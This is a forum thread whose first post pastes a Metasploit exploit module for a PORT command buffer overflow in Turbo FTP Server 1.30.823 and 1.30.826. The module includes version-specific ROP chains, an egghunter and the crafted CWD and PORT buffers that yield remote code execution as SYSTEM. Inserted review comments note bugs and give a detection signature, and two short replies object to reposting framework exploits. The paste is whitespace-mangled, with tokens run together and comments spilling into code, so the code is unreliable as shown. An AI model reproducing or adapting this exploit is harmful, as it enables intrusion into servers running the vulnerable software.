







Turbo FTP Server 1.30.823 PORT Overflow #1
Turbo FTP Server 1.30.823 PORT Overflow

Code:
##
# This file is part of the Metasploit
# Framework and may be subject to
# redistribution and commercial
# restrictions. Please see the
# Metasploit
# website for more information on
# licensing and terms of use.
# http://metasploit.com/
##

require'msf/core'
# NOTE(review): this listing was whitespace-mangled by the forum paste — tokens run
# together (e.g. `classMetasploit3<`) and several trailing comments spill onto the
# following line as bare code — so it is not runnable as shown. The comments added
# below describe only what the visible code does; the pasted code itself is left
# byte-for-byte.
classMetasploit3<
Msf::Exploit::Remote
Rank=GreatRanking
includeMsf::Exploit::Remote::Ftp
include
Msf::Exploit::Remote::Egghunter
# The FTP helpers used below (connect, disconnect, banner, connect_login, send_cmd)
# and generate_egghunter are not defined in this file; presumably they come from the
# two mixins above — verify against the framework version in use.
# Module metadata. Each concrete target carries 'Ret' (the value exploit writes over
# EIP) and 'ver' (selects the gadget list in create_rop_chain); the 'Automatic'
# target has neither and is resolved from the banner at runtime. 'BadChars' and the
# AlphanumMixed encoder with EDI as buffer register constrain the payload encoding.
definitialize(info={})
super(update_info(info,
'Name' =>'Turbo
FTPServer1.30.823PORTOverflow',
'Description' =>%q{
Thismodule
exploitsabufferoverflow
vulnerabilityfoundinthePORT
commandinTurboFTP
Server1.30.823&1.30.826,which
resultsinremote
codeexecutionunder
thecontextofSYSTEM.
},
'Author' =>
[
'ZhaoLiang',
# Initial discovery
'Lincoln',
# Metasploit
'corelanc0d3r',
# Metasploit
'thelightcosine'
# Metasploit
],
'License' =>
MSF_LICENSE,
'Platform' =>[
'win'],
'References' =>
[
['OSVDB',
'85887']
],
'Payload' =>
{
'BadChars'
=>"\x00",
'EncoderType'
=>Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions'
=>{'BufferRegister'=>'EDI'}
},
'Targets' =>
[
['Automatic',
{}],
['Windows
UniversalTurboFtp1.30.823',
{
'Ret'=>
0x00411985,#RETN(ROPNOP)
[tbssvc.exe]
'ver'=>
823
},
],
['Windows
UniversalTurboFtp1.30.826',
{
'Ret'=>
0x004fb207,#RETN(ROPNOP)
[tbssvc.exe]
'ver'=>
826
},
],
],
'DisclosureDate'=>'Oct
032012',
'DefaultTarget' =>0))
end
# Version check: fetches the FTP banner (connect, then disconnect) and reports
# Vulnerable only when the banner matches one of the two affected version strings;
# any other banner is reported Safe. No other condition is checked.
defcheck
connect
disconnect
if(banner=~/1\.30\.823/)
return
Exploit::CheckCode::Vulnerable
elsif(banner
=~/1\.30\.826/)
return
Exploit::CheckCode::Vulnerable
end
return
Exploit::CheckCode::Safe
end
# Returns the gadget list for `ver` packed as little-endian 32-bit words ("V*").
# Per the pasted mona.py comments the chain stages a VirtualAlloc call and ends in
# PUSHAD; all addresses are tbssvc.exe-specific. There is no else branch, so any
# `ver` other than 823/826 returns nil — exploit does not guard against that.
# The gadget comments are left as pasted; several spill onto the following line
# and would have to be rejoined with the preceding line before this parses.
defcreate_rop_chain(ver)
#ropchaingeneratedwith
mona.py-www.corelan.be
ifver==823
rop_gadgets=
[
0x004b692a,#POPECX
#RETN[tbssvc.exe]
0x005f6074,#ptrto
&VirtualAlloc()[IATtbssvc.exe]
0x0046f82a,#MOV
EDX,DWORDPTRDS:[ECX]#SUBEAX,EDX#
RETN[tbssvc.exe]
0x00423b95,#XCHG
EDX,EDI#RETN[tbssvc.exe]
0x00423a27,#XCHG
ESI,EDI#RETN[tbssvc.exe]
0x005d1c99,#POPEBP
#RETN[tbssvc.exe]
0x004cad5d,#&jmp
esp[tbssvc.exe]
0x004ab16b,#POPEBX
#RETN[tbssvc.exe]
0x00000001,#
0x00000001->ebx
0x005ef7f6,#POPEDX
#RETN[tbssvc.exe]
0x00001000,#
0x00001000->edx
0x005d7139,#POPECX
#RETN[tbssvc.exe]
0x00000040,#
0x00000040->ecx
0x004df1e0,#POPEDI
#RETN[tbssvc.exe]
0x00411985,#RETN
(ROPNOP)[tbssvc.exe]
0x00502639,#POPEAX
#RETN[tbssvc.exe]
0x90909090,#nop
0x00468198,#PUSHAD#
RETN[tbssvc.exe]
].flatten.pack("V*")
elsifver==826
rop_gadgets=
[
0x0050eae4,#POPECX
#RETN[tbssvc.exe]
0x005f7074,#ptrto
&VirtualAlloc()[IATtbssvc.exe]
0x004aa7aa,#MOV
EDX,DWORDPTRDS:[ECX]#SUBEAX,EDX#
RETN[tbssvc.exe]
0x00496A65,#XOR
EAX,EAX[tbssvc.exe]
0x004badda,#ADD
EAX,EDX#RETN[tbssvc.exe]
0x00411867,#XCHG
EAX,ESI#XOREAX,EAX#POPEBX#RETN
[tbssvc.exe]
0x00000001,#
0x00000001->ebx
0x0058a27a,#POPEBP
#RETN[tbssvc.exe]
0x004df7dd,#&call
esp[tbssvc.exe]
0x005f07f6,#POPEDX
#RETN[tbssvc.exe]
0x00001000,#
0x00001000->edx
0x004adc08,#POPECX
#RETN[tbssvc.exe]
0x00000040,#
0x00000040->ecx
0x00465fbe,#POPEDI
#RETN[tbssvc.exe]
0x004fb207,#RETN
(ROPNOP)[tbssvc.exe]
0x00465f36,#POPEAX
#RETN[tbssvc.exe]
0x90909090,#nop
0x004687ff,#PUSHAD#
RETN[tbssvc.exe]
].flatten.pack("V*")
end
returnrop_gadgets
end
# Exploit flow as written: resolve the target from the banner when 'Automatic' is
# selected, log in, send a CWD whose argument carries the egg (2012 random alpha
# chars + egg + 100 random alpha chars), then send a PORT whose argument is a
# comma-separated list of decimal byte values: 4 filler bytes, target['Ret'] (EIP),
# the ROP chain, a three-instruction stack-adjust stub followed by the egghunter,
# and 90 filler bytes. Then hand off to the payload handler and disconnect.
# Defender note: a well-formed PORT argument is six small decimal values
# (h1,h2,h3,h4,p1,p2). A PORT argument consisting of hundreds of comma-separated
# values, shortly after a CWD with a ~2 KB argument, is a usable detection
# signature for this traffic in FTP control-channel logs or IDS rules.
defexploit
my_target=target
# NOTE(review): `target` here is the currently selected target object (it is
# non-nil, since .name is read below), so after the banner checks `my_target` is
# never nil — the "No matching target" guard below cannot fire, and an
# unrecognised banner falls through with the 'Automatic' target, whose option hash
# is empty: create_rop_chain(nil) returns nil and `.unpack` then raises.
ifmy_target.name==
'Automatic'
print_status
("Automaticallydetectingthetarget")
connect
disconnect
if(banner
=~/1\.30\.823/)
my_target=targets[1]
elsif(banner
=~/1\.30\.826/)
my_target=targets[2]
end
if(notmy_target)
print_status("No
matchingtarget...quiting")
return
end
# NOTE(review): this assigns a method-local named `target` rather than calling a
# target= setter. Ruby makes `target` a local for the rest of the method once the
# parser sees this assignment, so when this branch is skipped (a concrete target
# was chosen manually) the later target['ver'] / target.name reads see nil —
# looks like it would raise; verify before relying on manual target selection.
target=my_target
end
print_status("SelectedTarget:
#{my_target.name}")
connect_login
rop_chain=create_rop_chain
(target['ver'])
# Every buffer component below is converted to comma-separated decimal bytes,
# matching how the PORT argument is carried on the wire.
rop=rop_chain.unpack
('C*').join(',')
eggoptions=
{
:checksum=>true,
:eggtag=>'w00t',
:depmethod=>
'virtualalloc',
:depreg=>'esi'
}
badchars="\x00"
hunter,egg=
generate_egghunter(payload.encoded,
badchars,eggoptions)
# Short stub assembled with Metasm and prepended to the egghunter (moves EAX to
# EDX and subtracts 0x1000 from EDX and ESP).
speedupasm="movedx,eax\n"
speedupasm<<"sub
edx,0x1000\n"
speedupasm<<"subesp,0x1000"
speedup=
Metasm::Shellcode.assemble
(Metasm::Ia32.new,
speedupasm).encode_string
fasterhunter=speedup
fasterhunter<<hunter
print_status("Connectingto
target#{target.name}server")
# CWD argument: egg sandwiched between random alpha padding.
buf1=rand_text_alpha(2012)
buf1<<egg
buf1<<rand_text_alpha(100)
# PORT argument: filler, Ret (EIP), ROP chain, stub+egghunter, trailing filler.
buf2=rand_text_alpha
(4).unpack('C*').join(',')
buf2<<","
buf2<<[target['Ret']].pack
("V").unpack('C*').join(',')#eip
buf2<<","
buf2<<rop
buf2<<","
buf2<<fasterhunter.unpack
('C*').join(',')
buf2<<","
buf2<<rand_text_alpha
(90).unpack('C*').join(',')
send_cmd(['CWD',buf1],
true);
send_cmd(['PORT',buf2],
true);
print_status("Egghunter
deployed,locatingshellcode")
handler
disconnect
end
en d

RE: Turbo FTP Server 1.30.823 PORT Overflow #2
Again a Metasploit exploit — please don't post these. Anyone with Metasploit will already have it, and it can't be used without the framework, so posting them is a waste of time.


RE: Turbo FTP Server 1.30.823 PORT Overflow #3
Ok bro, I will post other exploits, thanks.






